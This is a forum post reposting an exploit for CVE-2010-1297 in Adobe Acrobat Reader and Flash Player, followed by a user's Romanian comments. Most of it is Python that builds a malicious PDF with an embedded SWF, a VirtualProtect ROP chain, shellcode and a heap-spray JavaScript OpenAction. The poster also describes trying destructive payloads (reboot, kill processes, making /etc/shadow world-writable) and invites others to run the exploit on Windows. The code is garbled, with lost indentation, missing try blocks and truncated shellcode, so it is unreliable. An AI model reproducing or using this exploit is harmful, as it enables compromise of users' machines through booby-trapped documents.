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MOAUB #1 - Adobe Acrobat Reader and Flash Player "newclass" invalid pointer

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MOAUB #1 - Adobe Acrobat Reader and Flash Player "newclass" invalid pointer

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|_| |_|\____/_/ \_\____/|____/


Title : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability
Analysis : http://www.abysssec.com
Vendor : http://www.adobe.com
Impact : Ciritical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1297
MOAUB Number : MOAUB-01-BA

import sys

class PDF:

def __init__(self):
self.xrefs = []
self.eol = '\x0a'
self.content = ''
self.xrefs_offset = 0

def header(self):
self.content += '%PDF-1.6' + self.eol

def obj(self, obj_num, data,flag):
self.content += '%d 0 obj' % obj_num
if flag == 1:
self.content += self.eol + '<< ' + data + ' >>' + self.eol
self.content += self.eol + data + self.eol
self.content += 'endobj' + self.eol

def obj_SWFStream(self, obj_num, data, stream):
self.content += '%d 0 obj' % obj_num
self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))
self.content += ' >>' + self.eol
self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
self.content += 'endobj' + self.eol

def obj_Stream(self, obj_num, data, stream):
self.content += '%d 0 obj' % obj_num
self.content += self.eol + '<< ' + data + '/Length %d' %len(stream)
self.content += ' >>' + self.eol
self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol
self.content += 'endobj' + self.eol

def ref(self, ref_num):
return '%d 0 R' % ref_num

def xref(self):
self.xrefs_offset = len(self.content)
self.content += 'xref' + self.eol
self.content += '0 %d' % (len(self.xrefs) + 1)
self.content += self.eol
self.content += '0000000000 65535 f' + self.eol
for i in self.xrefs:
self.content += '%010d 00000 n' % i
self.content += self.eol

def trailer(self):
self.content += 'trailer' + self.eol
self.content += '<< /Size %d' % (len(self.xrefs) + 1)
self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
self.content += 'startxref' + self.eol
self.content += '%d' % self.xrefs_offset
self.content += self.eol
self.content += '%%EOF'

def generate(self):
return self.content

class Exploit:

def convert_to_utf16(self, payload):
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i + j]) & 0xff) << (j * 8)
enc_payload += '%%u%04x' % num
return enc_payload

def get_payload(self):
# shellcode calc.exe
payload =("\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
return payload

def getSWF(self):
#swfFile = sys.argv[2]
fdR = open('flash.swf', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:88]
addr1 = '\x06\xa6\x17\x30' # addr = 0c0c0c0c
str2 = strTotal[92:533]
#*************************** Bypass DEP by VirtualProtect ********************************
rop = ''
rop += "\x77\xFA\x44\x7E" # mov edi,esp ret 4
rop += "\x94\x28\xc2\x77" #add esp,20 pop ebp ret
rop += "AAAA" #padding
rop += "\xD4\x1A\x80\x7C" # VirtualProtect
rop += "BBBB" # Ret Addr for VirtualProtect
rop += "CCCC" # Param1 (lpAddress)
rop += "DDDD" # Param2 (Size)
rop += "EEEE" # Param3 (flNewProtect)
rop += "\x10\xB0\xEF\x77" # Param4 (Writable Address)
rop += "AAAAAAAAAAAA" #padding
rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret
rop += "AAAA" #padding
rop += "\xF2\xE1\x12\x06" #add eax,94 ret
rop += "\x70\xDC\xEE\x77" #push esp pop ebp ret4
rop += "\x16\x9A\x94\x7C" #mov [ebp-30],eax ret
rop += "AAAA" #padding
rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret
rop += "AAAA" #padding
rop += "\xF2\xE1\x12\x06" #add eax,94 ret
rop += "\x79\x9E\x83\x7C" #mov [ebp-2c],eax ret
rop += "\x27\x56\xEA\x77" #mov eax,6b3 ret
rop += "\x14\x83\xE0\x77" #mov [ebp-28],eax ret
rop += "\xB4\x01\xF2\x77" #xor eax,eax ret
rop += "\x88\x41\x97\x7C" #add eax,40 pop ebp ret
rop += "AAAA" #padding
rop += "\x70\xDC\xEE\x77" #push esp pop ebp ret4
rop += "\xC0\x9E\xEF\x77" #mov [ebp-54],eax ret
rop += "AAAA" #padding
rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret
rop += "AAAA" #padding
rop += "\xC1\xF2\xC1\x77" #add eax,8 ret
rop += "\xCF\x97\xDE\x77" #xchg eax,esp ret

str3 = strTotal[669:1249]
alignESP = "\x83\xc4\x03"
sc = self.get_payload()

if len(sc) > 2118:
print "[*] Error : payload length is long"
if len(sc) <= 2118:
dif = 2118 - len(sc)
while dif > 0 :
sc += '\x90'
dif = dif - 1

str4 = strTotal[3370:3726]

addr2 = '\xF2\x3D\x8D\x23' # Enter 0C75 , 81 RET

str5 = strTotal[3730:]

fdW= open('exploit.swf', 'wb+')
finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5

#strTotal = open('exploit.swf', 'rb+').read()
return finalStr

except IOError:
print '[*] Error : An IO error has occurred'

def HeapSpray(self):
spray = '''
function spray_heap()
var chunk_size, payload, nopsled;

chunk_size = 0x1A0000;
pointers = unescape("??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????");
pointerSled = unescape("<Contents>");
while (pointerSled.length < chunk_size)
pointerSled += pointerSled;
pointerSled_len = chunk_size - (pointers.length + 20);
pointerSled = pointerSled.substring(0, pointerSled_len);
heap_chunks = new Array();
for (var i = 0 ; i < <CHUNKS> ; i++)
heap_chunks[i] = pointerSled + pointers;


spray = spray.replace('<Contents>', '??') # Pointer to XCHG ESP , EBX

303033DD ? 87DC XCHG ESP,EBX

will do nothing

303033DF ? 45 INC EBP
303033E0 ? 05 00898784 ADD EAX,84878900
303033E5 ? 42 INC EDX
303033E6 ? 05 008987E8 ADD EAX,E8878900
303033EB ? 41 INC ECX
303033EC ? 05 008987EC ADD EAX,EC878900
303033F1 ? 41 INC ECX
303033F2 ? 05 008987F0 ADD EAX,F0878900
303033F7 ? 41 INC ECX
303033F8 ? 05 008987F4 ADD EAX,F4878900
303033FD ? 41 INC ECX
303033FE ? 05 005F5E5D ADD EAX,5D5E5F00
30303403 . B8 01000000 MOV EAX,1
30303408 . 5B POP EBX

30303409 . 83C4 30 ADD ESP,30
3030340C . C3 RETN


spray = spray.replace('<CHUNKS>', '40') #Chunk count
return spray

def generate_pdf():
exploit = Exploit()
swfFile = 'exploit.swf'
pdf = PDF()
pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1)
#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)
pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)
pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)
pdf.obj_Stream(4, '','')
pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)
pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1)
pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)
pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1)
pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)
pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)
pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)
pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)
pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)
pdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() )
pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)
pdf.obj_Stream(16, '<</Length 0 >> ','')
pdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1)

return pdf.generate()

def main():
if len(sys.argv) != 2:
print 'Usage: python %s [output file name]' % sys.argv[0]
file_name = sys.argv[1]
if not file_name.endswith('.pdf'):
file_name = file_name + '.pdf'
fd = open(file_name, 'wb+')
print '[-] PDF file generated and written to %s' % file_name
except IOError:
print '[*] Error : An IO error has occurred'
print '[-] Exiting ...'
if __name__ == '__main__':

Sursa: MOAUB #1 - Adobe Acrobat Reader and Flash Player ?newclass? invalid pointer

Eu l-am incercat pe Linux, dar nu a mers. Bine, am schimbat shellcode-ul intr-unul pentru Linux, am incercat si cu "reboot" si cu "kill all processes" si cu "chmod 0666 si 0777 /etc/shadow" si nu a mers.

nytro@rst:~> uname -r

Astept sa il incerce cineva pe Windows.

Luati si voi asta: http://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz

Sa postati aici ce ati reusit :)

Edit: Detalii


Edited by Nytro

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